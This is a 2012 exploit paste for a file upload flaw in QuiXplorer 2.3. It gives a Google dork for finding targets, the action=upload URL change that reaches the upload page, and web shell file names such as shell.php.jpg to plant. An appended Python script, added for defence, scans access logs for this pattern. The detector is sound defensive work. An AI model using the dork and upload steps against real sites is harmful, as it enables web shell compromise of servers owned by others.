LoginDeniedTD

QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability

Mar 16th, 2012
# Exploit Title: QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability
# Google Dork: "QuiXplorer 2.3 - the QuiX project"
# Date: 13/11/2011
# Author: PCA & krhr_krhr and
# Software Link: http://quixplorer.sourceforge.net/
# Version: QuiXplorer 2.3
# Tested on: Linux, Windows
# CVE :
----------------------------------------------------------------------
Vulnerability
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
----------------------------------------------------------------------
After going to this URL you will see a file manager.
You can upload your files here.
Find these icons on the page and click the last one; it is the upload option ::
You can also upload directly by changing the URL: just put action=upload&order=name&srt=yes
after index.php?
Quote:
Example: http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell Example: shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or
- any supported file
Click on your file to view it.
----------------------------------------------------------------------
PCA PERUVIAN CYBER ARMY & krhr_krhr and (HF)
PCA TEAM :
-rAtoN
-Chipd3bios
-jardha
----------------------------------------------------------------------
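
For defenders, the request pattern described above can be hunted in web server access logs. The following is an added example, not part of the original paste or of QuiXplorer: it flags a successful request to index.php with action=upload and then any script-named file (including double extensions such as .php.jpg) fetched by the same client. The log lines, IP addresses and the /files/ path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs, paths and times are made up.
SAMPLE_LOG = """\
198.51.100.7 - - [16/Mar/2012:10:01:02 +0000] "GET /files/index.php?action=list&order=name&srt=yes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Mar/2012:10:01:40 +0000] "POST /files/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Mar/2012:10:02:05 +0000] "GET /files/shell.php.jpg HTTP/1.1" 200 44 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Mar/2012:10:03:00 +0000] "GET /files/report.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Mar/2012:10:04:00 +0000] "GET /blog/page.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Captures: client IP, method, request target, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Script extension anywhere in the file name, so "x.php.jpg" matches as well as "x.php".
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|asp|aspx)(\.|$)', re.I)


def scan(log_text):
    """Return (client_ip, target, finding) tuples for the upload pattern."""
    uploaders, findings = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, _method, target, status = m.groups()
        if not status.startswith("2"):
            continue  # only requests the server answered successfully
        url = urlsplit(target)
        name = url.path.rsplit("/", 1)[-1]
        action = parse_qs(url.query).get("action", [""])[0]
        if name == "index.php" and action == "upload":
            uploaders.add(ip)
            findings.append((ip, target, "upload action reached"))
        elif ip in uploaders and name != "index.php" and SCRIPT_EXT_RE.search(name):
            findings.append((ip, target, "script-named file fetched after upload"))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```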